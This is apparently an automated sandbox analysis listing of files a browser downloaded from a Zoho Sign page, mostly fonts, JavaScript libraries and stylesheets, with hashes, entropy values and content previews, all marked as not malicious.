                                                      Preview:wOF2......rD..........q...Y.....................?FFTM...D...8....V.....l........(..U.6.$...|...... ..b...2...[}...T.W.ds.....D..W..dx?.....M..mQ..1.....g......u.U.V....o?..`f.....................d":.dr...N(.5..1......`...r0..4.b....kO.jm...A.........|@...'.b...h$/P).:..........d.%.P.@SLY.T.W..*Up.....sl|..Q...|q..2..+....<.R..U...28...Q....va]w=.@.7....jU.L.4n..Q.iN.....&Z.,......%Ef..U.&RH.......,....|..y.!5..l{w..#.N.k..=.....mf~....W@.W..~....9..........Y.....i......1.s....}'.S....(FFFF.,..B`.......^.r9[g0R..{=.4.p.AI.cFjz|..{*V.....A:#v..n..mS.......c.6.t.:....9.f......8.z...Cs.,H.." .".#..Lk.Q...........z.Pt.{!*.d2.r.f[\.^..T.2.C..oXY...._u..Fi.F.......x.* \)...57.x.b....M...;./...pP...2H..H.C.....o...E...Ch6o.....K"h.t...ZU...i.&...w..D8..]y..H....$;G.:.*..............I98h..n../.q....#...M.(.u.v...6.6=y......`......2x.i.Z.V,*S. ..+.....d..!m..[...K. )yn...u`D..rX....Di0#;7.v..*....F.i.fIug../.+W..o .*P>1...;D.<g``..Z..j;...3. ..<A[
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:TrueType Font data, 20 tables, 1st "GPOS", 31 names, Macintosh, Copyright (c) 2015 by alphadesign. All rights reserved.Fancy SignatureRegularalphadesign: Fancy
                                                      Category:downloaded
                                                      Size (bytes):89100
                                                      Entropy (8bit):6.489005806987966
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:929C36B43ADE363591B36C08F8F7F8C9
                                                      SHA1:DEBEF578C6A63F0DEAB580D5516BFD3C5A6D122F
                                                      SHA-256:99C562F0B07E19CF02F0569EC367F275C7633A4791059FA7EB23B89EA0B331B9
                                                      SHA-512:1C4D7CC32AF85526590AA0F7AF6405863D7B056A66AFD7097565030F92BF8636354C3C4CCEDA64CF9DCC9DF2106AC0C399D7FEE8EF0F590B4991AC894F283159
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/fonts/Fancy-Signature.929c36b43ade363591b36c08f8f7f8c9.ttf
                                                      Preview:...........@GPOS[6Ke..Q.....GSUB......[.....LTSH.b.....<....OS/2..[........`PCLT..%..Q....6VDMXU.\....H....cmap..e...$.....cvt .@....-...."fpgm.V.4..+....sglyf^K+...-....Lhdmxy.Pb...(....head.H.y...L...6hhea...........$hmtx".%....(....kern..O..<4... loca...:..:(....maxp...F....... name|.....IT....post.<....O@...zprep..p...,............B[[.._.<..;........ ......9.9.1.V.y...................X.......1.!.y.............................................................G.....o.G.......f..............................Bits.@. .....U...X...........x.J... ....._.....-...-.....,.}.`._...j.C.-.e...1...`...v.9.h.z.e...9.-...O.;.......p... .......!...=.....9.'...<...u...&.r...-...-.....0.W.F...}.....g...8...".....C...8...A...I...:...2...............-...-...F...-...d.{.........#...M...%...$.H.,.0.@.......0...@.2.....>.........L.\.....R.......1...............J.0.&...:.1.......G.<...........................r.....*."...k...........v...9...................u.....C...A.h.F...-...%............................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 29316, version 1.6816
                                                      Category:downloaded
                                                      Size (bytes):29316
                                                      Entropy (8bit):7.993018759506104
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:0C834AE5AD0F21A5FA64D035A37E8D96
                                                      SHA1:33EBD33923BE30A6C781EBEDBAA5D15C49CE46C7
                                                      SHA-256:4F84C8040046B224E339583F1A7265279D52E084143CD6B497691FDC4ABD613E
                                                      SHA-512:A413966F6ECE16A037623AB35E4CDEF96E802A20F03CB5DFE4267AAEBF59B2ECFF398358B7DB116D36DD981976D516C32715B1AEBC989C89DEC4AA1AB4BC6537
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/latobold/font.woff2
                                                      Preview:wOF2......r.......(...r.........................?FFTM..*.....j.`.......e.....(..D.6.$..@..... .......K[..q..x...;.}.J.c.E....T.p...{.3Z(>.....^...C.........D...P......Jt.Z....Bi...TfUF..<K..~4.g]OmN.N.>6......y;C.pJ...E....UC...._j.~.......B..<.)_&2e.3...?........~..f...8...z.._,=.RV....t....?Ow..}.@..ZaWQ..!T@...Kl.R[>. ...........R>...n......H....X......d..Fl..l...(......AE..6.X..Q...K..n.{/..@ ..{"VQ]..={....G.M...6t..n.}......M.*....l.].........:....XB...0.s..bj'..j........ ...b......1I...Z..>.......J.C".|e...,.....qZ...........x"N.T.g.t.}.U.Zee...*51B..j.<......{.......$x.~r...i..vi.R.Tqs.K....v....@?....._0.......N.o...9.R.UE.w.k.#...K.....Q."./..[..47..k.+.m..........P.....\?.O.3u.) ..~.K:.%.B..sY..@B...et%9.q.nF.F#G.&l..Pk........?.r...a...-.H.8.;..Z!..`.V...d...[.QL...p.7dW.$.iw.TRA=...e..[VO.....=..$.....S.mg@..~....Y.u..R.1v.S.....I."...a.P).LK*..f...@....(e.'..J?."7dnt.E.*...n.+.w.\..j....W.[.L..2zp...+.uf!.[B.<.!2f@.y.4...lk~O.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 18028, version 1.589
                                                      Category:downloaded
                                                      Size (bytes):18028
                                                      Entropy (8bit):7.988319422898098
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:448C34A56D699C29117ADC64C43AFFEB
                                                      SHA1:CA35B697D99CAE4D1B60F2D60FCD37771987EB07
                                                      SHA-256:FE185D11A49676890D47BB783312A0CDA5A44C4039214094E7957B4C040EF11C
                                                      SHA-512:3811804F56EC3C82F0BEF35DE0A9250E546A1E357FB59E2784F610D638FEC355A27B480E3F796243C0E3D3743BE3EADDA8F9064C2B5B49577E16B7E40EFCDB83
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/glyphicons-halflings-regular.448c34a56d699c29117adc64c43affeb.woff2
                                                      Preview:wOF2......Fl.......\..F....M....................?FFTM.. .`..r.......$..e.6.$..t..0.. .."..Q?webf..e.5...@..?....... ..t............,3+.2q..F..YO...&>..b.m.5.Z..H$..Y....{.H.jd......%....y"......+.@..]..e..{...v..Nc.)..n...?~?.h...._.&i..........?.>..^K .v.-.c.1....2K..y..,'n....(.3Ewi.B....&.....T.lh.0M.....d.Y.r...nti.].yur........VXsj.....gMn...H.W..... r2.>iT`V7..R(.......+.o6.'c..B.....4..........T.]a[Qd<3wq8,...rTI..8....0>E.?.*E...#..7'.....S...oc..._.7&#*.+)....+4a..A6.c..y...f(b.F.....$;{ YA.1vP-tG........".....C.f- W.......uK.K..#.....*K.<... (.......Z.`...[.%.Y.T..{%..$....s{o.........vt"p..4`.....}o.`....'n.e.>..G.5s.z._N...PK.vmU...{z............."3`l.....W#..^.@+.,.c..ko..AO.p.nu...z.zJ).......1.}...O=.....x.R..`.J.`.q....Us/.+.k.v.1xl....j.l..El.\nD.....V.....jg.{Zd..z7...5..!.xm.5o.[....u..&..1.H.BkA...qr..R........(\gh....7...y.=.H.Z.UPh..$8.Rg.....z.g..N:...1u.$.....>R.]......."..f7....K.^.'...3.+E/..^.YU5].NB......8..+.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 225684, version 2.22937
                                                      Category:downloaded
                                                      Size (bytes):225684
                                                      Entropy (8bit):7.998393603786439
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:55DA36CE61928D97B870670B3C951F45
                                                      SHA1:5E12C5EE230233E5A3A8FA136BB699020687A99A
                                                      SHA-256:F23DA30DE5A567D10A90F4770416B5D0795B4399277E3F1BBD23EFC4CD5EB79B
                                                      SHA-512:AD08C5513A623457396C73C6847DC3973662193527A215B7FE5EF4C0194021716A2A6122E5CAD59D6E40BB731479DF678B38087F83761C09890E82E57B55285C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/dejavusansboldoblique/font.woff2
                                                      Preview:wOF2......q........X..q'..Y.....................?FFTM...D..."....V.....D........<..X.6.$...b...h.. ..*...5..k[N....TW..j....m...Z~..l.s!+d.L.........,`.@.3..3..m..<......E=P.L...................w.L.i.\.lN3.n... (....sP...$..m_.z....9..%.!...f|br.M.P..<..e.<.Q..3.A.c....QiT!L.N..G.BD.[l.C.8La.3.<EO}.."..!.-.K..R..yq.." .[...V..n.'OuU...S....&...ze1....D.qN.....z...HN.JJ.s.......&8`.....C.RS.tw..Z.,.^j.W.mb......q%G...j..&O.......]...G.v..{.....o......B...!.....L:.+..].R.1..Y8*." ...h...mv.nT.... M.8..@.7....'....-..{.I.S2.....h.y.=yv.......m.[..R^`..U......*.t.X.R...e..t. .8z~nnn...."C.xA..{..Z).YF. ..r.r..u..Y'.#...*.$P...LWop.(S..p...`..5..y.Y....!.u0.I..3..zr...;...n.......A.... ..?......).#;.^Y6/L..v...n..'....`.0.f.;w.eZ.+...i....9.{.)9..{0H..5FM^A.......R.k.''_B....5l.{R.....t.r%P.....y...o.l..o.)./.C.;.W..s..#.......6.0<...l.x.R...B....!".<..:.A.\p.PU.q_.P.....(..8....5.6......jH...<:%..jkJ<m8B),.1..@..lC.M9..>..>..v4.*....)6b.?..F.H
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:TrueType Font data, 20 tables, 1st "GPOS", 25 names, Macintosh, Copyright (c) 2011 by Brittney Murphy. All rights reserved.Sweetly BrokenSemiBoldBrittneyMurphy:
                                                      Category:downloaded
                                                      Size (bytes):145648
                                                      Entropy (8bit):5.866656017196124
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E3A3C867DB18CA73725B5B164FA661B2
                                                      SHA1:7144665CA09A89D5A7C9BE6F559448D24A80FFFF
                                                      SHA-256:03BE700BD580380580CA6E7A95E65040C96499128F1D70CC348E132AB44F9E5E
                                                      SHA-512:FC535E79678630AB6912A006D0ABBFC83B791483C3E41342BF020B1B6C7F4FC8D67BF672E1FB762D3D049D84A78FB1BD72C304ADAC30BFB7E24D0F1A6AEC8E94
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/fonts/Sweetly-Broken-SemiBold.e3a3c867db18ca73725b5b164fa661b2.ttf
                                                      Preview:...........@GPOS......7....LGSUB......8.....LTSH7..Q...X...POS/2e..........`VDMXU.]*........cmap.n~...,....fcvt .B....7D... fpgm.Y.7..5(...sgasp......7.....glyf......7d...hdmxU.........8head.L.....L...6hhea...e.......$hmtx...{...(...0kern......)....&loca......&.....maxp.g......... name../...*.....post.._...0L...6prep*q|w..6............B.*. _.<.......................................................2...................L.....L............................./.X.....................2.....................J........PYRS.@. "..........k...........i... ...........{.......~...l...?...................j...s...........................f.......x.Q.................p.....G...=...............N.....\...m...c.....j.:.......................e.............Y.....>...............&...Q.......................................5...I...................V...-...O.......M...G...H...............................................B.......{...+...........c.......3...L...............B...............K..........................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 49500, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):49500
                                                      Entropy (8bit):7.995238836027721
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:E9303FB359F6DD50295B14A12F2D545A
                                                      SHA1:BDF43AF1BAF7F2B2FA51CD9450F22EF00E031776
                                                      SHA-256:F900B714C1B546D6B879D3A0ECEB69DFF219D8638998B80392735AF2B6851E77
                                                      SHA-512:55B7011418A3DDF446673742D50062A7A0E02BE403376CF40C568998331CA28056911C4A3EBB873F082D7FCACE7C2EBC5542638FB2F34A2ECB34667761CFEAF8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/heuristicaitalic/font.woff2
                                                      Preview:wOF2.......\......}.............................?FFTM...N...B..\.`..^........f.6.$.....4.. ..4..7[".....?"....F.|..x.g"..OD...!...J.P.tS..fA,.>......W$.g.oW.U.*.....MhT..]E.D.m.*...R.2.b...,C....Y.T....b....V8..5...Y.S%.....J...a..4....v?.AG82...po..h..;.D.S..,........f..7..!...5..9......D/!......%$.0.......~.W-........w.d..S.......?...'...+....oN_...D.:..b=.._..{.5...o6.6....y.Ln.@.]..3G/..O......Y......;...bD......%.<..`Z14.y.<.&..*.x...b.^..~m...P..8..88.9.k.;.....hE......H..w....M....2.r.....w ..4.x.%.+..5.....E.gl...$<CH....e.S.!<R.)..f|.X..>..X.....5..Z.kmuM...6.Fr.f(P...1..L.k@..e..px%..kz.....?....y....RZ....c_}..q....%E....L.:..5....C%.....pE[Z0.h..T...^.....W.K..^R...Aj....7.......f~.*X.U'fS..#.S]+}.`..\6.....Hn....#5p-.x4..........s......O......7k...b...........N..!.K...*............h).~.T.b...._.z.,p. ........%.............F.%...C.;v<.n..{......2./....@.j?...;x...`.1**B..#(.....U..8.=..[bx...y!.8..*....D........4.o}^x.rKZ.$.r.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 147096, version 2.0
                                                      Category:downloaded
                                                      Size (bytes):147096
                                                      Entropy (8bit):7.997869610590821
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:7A13F57AB953312492BCE429A67B16CC
                                                      SHA1:F19CA5676390C2CAAB85141A7226887711BF4E06
                                                      SHA-256:E60DB7B608625B9E9EF93CFAEE2DBC3683032AB4B711C072701A1644E8A5DEEC
                                                      SHA-512:60F63C152CA92A73148F0234338A7D3C51FFB1BF548992E0485750A2B8B8449BBD7E1440D6C70E53F1F4EEB00445455578FEB9B369623FAD1138B23948B861CA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/liberationserifitalic/font.woff2
                                                      Preview:wOF2......>...........>-........................?FFTM.......Z..b.`..F..R..4.....8..}.6.$..`..d.. ..J.......[....lk:...G....mC.~.=.L-....1F........C.]u..........a.7.8w..D................d"...0....`".L...Q(.@......Y...AP...k...*.dNI-.Zhw.2RBiWH.....C........0_....+..b.h).7B.m2@.%+fZ...Jw..*...9ND ..]Q..C.-*]2-...9#v>,..X.V..I...q.....Lq.V.\X..k.0...b.W..{.0d"(..lO.f...+C$7...|[0.-...g.z.9rx..{/.5....%5<...1.....y....)#D.L....1.ry..H.;.XHx*.Yx..O"..5+x..).....=.kR@.K.b_q38.i..d..._....3a6tJ......J,#.T.4L.q...e."+....-...%...FJ..(...A..AJ...../......QSR..B...'...........9.v...[....?.#...........9....Th...UC.....z.K..."..".).*.].2Gx../.....w...%.$*k..0.t.K.j.%./...B.(...4......p.Qm.:#..q..y.7.'..dF.....P....C.e.f..>.3a>.G.T.G/.O......y.g......9.A.6-.EF.|.B...[..#...6[7..T....b...d...%U.... .....0.>..@..I.'...f2D....bF...L.oh....].p..8V0".S..c.-{.1...i@.g.B.r.)..}e..#.n...0.....v.1.A-...."^.t..uJ..KO.-....V..5.SY_2....BB...%.W....Ea....{V...=.....K.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:dropped
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):2294401
                                                      Entropy (8bit):5.369127001902288
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3AD5C41D90ECAE4E544C09E22D7F2309
                                                      SHA1:F970255D7496D617483FC4B852F89F4FE9782AFE
                                                      SHA-256:9B36C83D3B73D78563C6863D672145BCFDB44CFC20AAE78533CC4447CC925B50
                                                      SHA-512:1FE44B28D42BD739BF90E629E48358BD02283D2D17E423681CCF54E9A07010B63527522D362C2B0F1ED93A1B74CB7A4D320C8E19131B16EAFC6D279670F7676A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/pdf.worker.3ad5c41d90ecae4e544c09e22d7f2309.mjs
                                                      Preview:/**. * @licstart The following is the entire license notice for the. * JavaScript code in this page. *. * Copyright 2023 Mozilla Foundation. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. *. * @licend The above is the entire license notice for the. * JavaScript code in this page. */../******/ var __webpack_modules__ = ({../***/ 9306:./***/ ((module, __unused_webpack_exports, __webpack_require__) => {...var isCallable = __webpack_require__(4901);.var tryToString = __webpack_require__(6
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 67552, version 2.8978
                                                      Category:downloaded
                                                      Size (bytes):67552
                                                      Entropy (8bit):7.996618211599251
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:3EC9CFFD052CD51A5475C0FBCD805509
                                                      SHA1:E05434A0852F106A559B2AD1E98D282ABBFB3EC3
                                                      SHA-256:FAB270511B8978075514A01AB5DFFF5AE2C0F14BD770D00A0F6717A9C1BF8F11
                                                      SHA-512:3B74A3FD25F03089BFDEB6F0E37C900A5ED745B61A2A5BE57948BB96766DD186E5132B4E1F510197E47544DACCD3C44046980F8F15B653C9C5F58A2DFEA95E3E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/robotoregular/font.woff2
                                                      Preview:wOF2..................w..#.....................?FFTM..~...L..L.`....T..<.....$..s.6.$..8..... ..q..f..I[ ...*.....wv..5%...t..c..T.9V...`.U...m{P.v...........U.$............vu...@.4*...L..D.E.h..egP..{......#...Xx....!.$.....#...4..8.I,.W.N.6.M:.o.\%5..z....a.....R&.k..]...O.N~.'.w...>.{.2....h.....n....Hp:...u..<.#..O0u...ct.^..T..v.<.{).o.C+....=.l.....u..H...ps.......p.FG.4gbEb.Yl.K...Hc[...ub}swQ.w.bI..P....$j.J...? I.u.v.S.bS........?xd.....".a..O.*...%O.~`..6..N..].G6.....q..j..j.....r...x.|..B.iU%i.I..9.....=.q..8...........(...P..F...`N.m:.Z).D.....#..E..*F2@s.n..R!-F.....,P.....1.5lcT..Fm0.%..PL.A(s...^.p.e..`.Rc$....Z.....A......@...h....j|...`.......z.D.~....z._.....IQ.Rt.(]....>.R..%.B...H......s.w.Y>88B5.@-.<"A....?b....h.\..........D....s\...+....9.."&r.....\`.s.C....o~~.D.3]...>q*.6..12...6$R...*)C...0..0.C..S..U..UW.nf~L..c.h.4<.k..j#.N....C...f........J...56`...%....5..FD.@@6..A.P....UD.....;.dW.6...%....(.;.nU]ga..,.`.H
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 147036, version 2.0
                                                      Category:downloaded
                                                      Size (bytes):147036
                                                      Entropy (8bit):7.998174332483517
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:AA434C4CC38D72EA88F2FDB2CD2F7BF2
                                                      SHA1:659CB79DFB4842C929ADF356D650DBDA801E9BD0
                                                      SHA-256:528245FD95C3AB02AAF3B2828A3C1B20ECE948331871334A3C84320E00C9BC5A
                                                      SHA-512:8AEDF3E30CE3F47FFDE31E75F13FD2F4E54DC8CBEEBAB286A1B91D9D60FF30C0FB752B5EFFCB3E51947634FEBBBB7004C9822217E3085363F6B836A0B77F1ADC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/liberationserif/font.woff2
                                                      Preview:wOF2......>\.......|..=.........................?FFTM.......R..P.`..6..R..4.....l....6.$..@..D.. ..#...7...[.,.We.L....3..D.s.......2.d....Id.:;F.......S ..M....*;G.OI..s.................Il.$.d..R.3..V.j.:.$J$.....H..O..sx..R_&.*..kp.&.gZ...u.....T....@0.uD.9.j'..1.vo:.K.......,.....J.T....<#....Z7..z.L......z..Z?.Q.....s&..).......6.-.K.9P+TI..'....JK.x. E...~.C:6..{2E..L.Nai.h......,'.!H...%.X..%....R$E.....r........9...:.8F.jB....|.;...D...[E...K.nF...w.*..('lO...."-......../..Z.2FqN}n..[.~.X!.1<d;..T.?..k....Y'...!.F.0P...1.Q.(U...c<.H...@%Bz...l..a.ds.$.t...2B..._ D#6.1.P.-t./P......sL....6..@8.:1Y..g..D|.D......i;{d.f..@...ThJ.O".I...n..H.=9o...t.$.......J..5p.:...%....2M....>."f..,u.S.g..n1..>.....m..R.Y....x}..e...9*0...G.~..*f.q...$....<)..U_...o...... -...qHE!%*De.Ll....c-..f...YAG ....aEX...!.{T{DHp...R.%..eVv....a.f._.#..~6&n..ODR:R#.*..<...O|.0.....'L3.&.cV..W.......Y7*....{.WGV.f.ej.k'Q.U..k.. ..E[_...ub0?.../*.%?....}a<.G&..9......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (310)
                                                      Category:downloaded
                                                      Size (bytes):16908
                                                      Entropy (8bit):4.984775999237603
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:57B07FFD717E01EFF86DFAEE905F2079
                                                      SHA1:0805852C2524241FC4773043C1FD43D182FBCBD1
                                                      SHA-256:35EDACB98E6C6E9E4E3B66EC34524E2D544FFF658B0C136C66598922D7AFE4FC
                                                      SHA-512:3636A76418F09DD4558673CAA564293F8F6EAFC0768501E8633304EFDECE5EEE7E0A00222FFFED1E851878AC4BC14016A03A79F7D0D6780F0F83B504CBA91F0F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/ui.jqgrid.57b07ffd717e01eff86dfaee905f2079.css
                                                      Preview:/*Grid*/..ui-jqgrid {..position: relative;..-moz-box-sizing: content-box;..-webkit-box-sizing: content-box;..box-sizing: content-box;.}..ui-jqgrid .ui-jqgrid-view {position: relative;left:0; top: 0; padding: 0; font-size:11px; z-index:100;}..ui-jqgrid .ui-common-table {border-width: 0px; border-style: none; border-spacing: 0px; padding: 0;}./* caption*/..ui-jqgrid .ui-jqgrid-titlebar {height:19px; padding: .3em .2em .2em .3em; position: relative; font-size: 12px; border-left: 0 none;border-right: 0 none; border-top: 0 none;}..ui-jqgrid .ui-jqgrid-caption {text-align: left;}..ui-jqgrid .ui-jqgrid-title { margin: .1em 0 .2em; }..ui-jqgrid .ui-jqgrid-titlebar-close { position: absolute;top: 50%; width: 19px; margin: -10px 0 0 0; padding: 1px; height:18px; cursor:pointer;}..ui-jqgrid .ui-jqgrid-titlebar-close span { display: block; margin: 1px; }..ui-jqgrid .ui-jqgrid-titlebar-close:hover { padding: 0; }./* header*/..ui-jqgrid .ui-jqgrid-hdiv {position: relative; margin: 0;padding: 0; over
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (477)
                                                      Category:downloaded
                                                      Size (bytes):511720
                                                      Entropy (8bit):5.048160651983183
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F254CD172715959C35600C907B37AF59
                                                      SHA1:A432B6C15DAA2FE4D7DC862DDA6972A710B975BF
                                                      SHA-256:29BCEA75373440D591316EC9D1839ADDB4E447E64DB67095C8B35DDDEDD29DBE
                                                      SHA-512:23750D07A8B2BE627DEB9FA98B2507A2B488B56418465E9E8845EB12AE621B967BF7C560933B9B642EAEE42A810699D4558446CE4D06F8D1285B571D407BC9E6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/style.f254cd172715959c35600c907b37af59.css
                                                      Preview:/* embercli css start */.:root {. --theme-color: #1da586;. --theme-color-rgb: 29, 165, 134;. --pale-gray-30:#e6e6e6;. --half-gray-50:#888888;. --black:#333333;. --dark-black: #000;. --red: #ec6d6d;. --red-rgb: 236, 109, 109;. --charcoal-blue:#262F36;. --dark-charcoal-blue:#181919;. --elephant-gray-70:#666666;. --ash-gray-40:#d7d7d7;. --silver-grey-20:#F5F5F5;. --white:#ffffff;. --transparent:transparent;. --misty-pink:#FFF7F6;. --rose-quartz:#FFC6C6;. --cinnabar-red:#e03c2a;. --blood-red:#ff0000;. --maroon:#a50000;. --orange:#ff9a00;. --tangerine-orange:#ec6b01;. --rust-red:#ca4100;. --brown-lite:#b78858;. --choco-brown:#7e5546;. --citrus-green:#81b000;. --lawn-green:#7fdf00;. --stone-green:#00c655;. --pigment-green:#04923d;. --forest-green:#39630b;. --turquoise:#009788;. --apple-green :#F5FFF9;. --military-green:#5f5b18;. --yellowish-green:#d8d80f;. --naval-blue:#0f4f88;. --royal-blue:#00459c;. --sky-blue:#4588f0;. --airborne-blue:#627da7;. --bab
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (324)
                                                      Category:downloaded
                                                      Size (bytes):33109
                                                      Entropy (8bit):4.99306229519715
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EA3FC4720F5F76F8EB21A41E2DE988F8
                                                      SHA1:413D6B30E443233F23E032411731D49AABC3EC02
                                                      SHA-256:95BB5A863E315D76C0709159DA4250F4F8E6DCA89669AB0B5232A890A07FC56F
                                                      SHA-512:F40EDEBC3C25FABAB10BA6350FBE0248B13376C87F94E1A4F2DA8286F0516092B3D34291CD435B09493DA9DE0F9B26DD2285318770CDAC8D3AEFA6169DD04391
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/guest.ea3fc4720f5f76f8eb21a41e2de988f8.js
